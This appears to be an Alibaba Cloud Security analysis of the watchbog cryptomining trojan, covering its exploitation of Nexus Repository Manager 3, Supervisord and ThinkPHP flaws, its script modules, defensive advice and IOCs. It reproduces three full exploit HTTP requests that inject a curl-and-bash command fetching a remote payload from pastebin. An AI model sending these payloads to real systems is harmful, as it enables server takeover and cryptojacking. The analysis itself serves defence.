背景
近日,阿里雲安全監測到watchbog挖礦木馬使用新曝光的Nexus Repository Manager 3遠端程式碼執行漏洞(CVE-2019-7238)進行攻擊並挖礦的事件。
值得注意的是,這一攻擊開始的時間(2月24日),與2月5日上述產品的母公司釋出漏洞公告,相隔僅僅半個多月,再次印證了“漏洞從曝光到被黑產用於挖礦的時間越來越短”。此外,攻擊者還利用了Supervisord, ThinkPHP等產品的漏洞進行攻擊。
本文分析了該木馬的內部結構和傳播方式,並就如何清理、預防類似挖礦木馬給出了安全建議。
挖礦木馬傳播分析
攻擊者主要通過直接攻擊主機服務的漏洞,來進行木馬的傳播,也就是說它目前不具備蠕蟲的傳染性,這一點上類似8220團伙。即便如此,攻擊者仍然獲取了大量的肉雞。
尤其2月24日,攻擊者從原本只攻擊ThinkPHP和Supervisord,到加入了Nexus Repository Manager 3的攻擊程式碼,可以看到其礦池算力當天即飆升約3倍,達到了210KH/s左右(盈利約25美元/天),意味著最高時可能有1~2萬臺主機受控進行挖礦。
以下為阿里雲安全採集到的3種攻擊payload
(1) 針對Nexus Repository Manager 3 遠端程式碼執行漏洞(CVE-2019-7238)的利用
POST /service/extdirect HTTP/1.1
Host: 【victim_ip】:8081
X-Requested-With: XMLHttpRequest
Content-Type: application/json
{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "233.class.forName('java.lang.Runtime').getRuntime().exec('curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby')"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
複製程式碼(2)針對Supervisord遠端命令執行漏洞(CVE-2017-11610)的利用
POST /RPC2 HTTP/1.1
Host: 【victim_ip】:9001
Content-Type: application/x-www-form-urlencoded
<?xml version=\"1.0\"?>\u0002<methodCall>\u0002<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\u0002<params>\u0002<param>\u0002<string>curl https://pastebin.com/raw/zXcDajSs -o /tmp/baby</string>\u0002</param>\u0002</params>\u0002</methodCall>
複製程式碼(3)針對ThinkPHP遠端命令執行漏洞的利用
POST /index.php?s=captcha HTTP/1.1
Host: 【victim_host】
Content-Type: application/x-www-form-urlencoded
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
複製程式碼以上三種payload的目的都是相同的,那就是控制主機執行以下命令
curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
複製程式碼木馬功能結構分析
被攻擊的主機受控訪問 pastebin.com/raw/zXcDajS… ,經多次跳轉後,會得到如下圖所示的shell指令碼,其包含cronlow(), cronhigh(), flyaway()等多個函式。
分析後得出,該指令碼主要包含以下幾個模組:
1.挖礦模組
挖礦模組的download()函式,會從ptpb.pw/D8r9 (即$mi_64解碼後的內容)下載由xmrig改寫的挖礦程式,儲存為/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog,並從ptpb.pw/hgZI 下載配置檔案,之後啟動挖礦。
另一個函式testa()也是類似,只不過它下載的是xmr-stak挖礦程式。
2.持久化模組
將要執行的惡意命令寫入/etc/cron.d/root等多個檔案
3.c&c模組
c&c模組主要在dragon()和flyaway()函式中實現。
如下圖所示為解碼後的dragon函式
它會依次請求pastebin.com/raw/05p0fTY… 等多個地址,並執行收到的命令。有趣的是,這些地址目前存放的都是一些普通單詞,可能是木馬作者留待將來使用。
flyaway()函式則與dragon()稍有不同,它會先從pixeldra.in/api/downloa… 下載/tmp/elavate。
逆向可知,/tmp/elavate是使用Ubuntu本地許可權提升漏洞(CVE-2017-16995)進行提權的二進位制程式。提權後,嘗試以root許可權執行從pastebin.com/raw/aGTSGJJ… 獲取的命令。
安全建議
阿里雲安全已和pastebin.com進行聯絡,要求禁止對上述惡意下載連結的訪問,對方暫未迴應。此外,雲安全為使用者提供如下安全建議:
- 網際網路上攻擊無處不在,使用者平時應及時更新服務,或修補服務漏洞,避免成為入侵的受害者。
- 建議使用阿里雲安全的下一代雲防火牆產品,其阻斷惡意外聯、能夠配置智慧策略的功能,能夠有效幫助防禦入侵。哪怕攻擊者在主機上的隱藏手段再高明,下載、挖礦、反彈shell這些操作,都需要進行惡意外聯;雲防火牆的攔截將徹底阻斷攻擊鏈。此外,使用者還可以通過自定義策略,直接遮蔽pastebin.com、thrysi.com等廣泛被挖礦木馬利用的網站,達到阻斷入侵的目的。
- 對於有更高定製化要求的使用者,可以考慮使用阿里雲安全管家服務。購買服務後將有經驗豐富的安全專家提供諮詢服務,定製適合您的方案,幫助加固系統,預防入侵。入侵事件發生後,也可介入直接協助入侵後的清理、事件溯源等,適合有較高安全需求的使用者,或未僱傭安全工程師,但希望保障系統安全的企業。
IOC
礦池地址:
pool.minexmr.com:443
錢包地址:
44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B
相關檔案:
其他惡意url:
pastebin.com/raw/AgdgACU…
pastebin.com/raw/vvuYb1G…
pixeldra.in/api/downloa… (用來下載32位XMR挖礦程式,連結已失效)
pastebin.com/raw/aGTSGJJ… (目前不存在)
pastebin.com/raw/05p0fTY…
pastebin.com/raw/KxWPFeE…
pastebin.com/raw/X6wvuv9…
Reference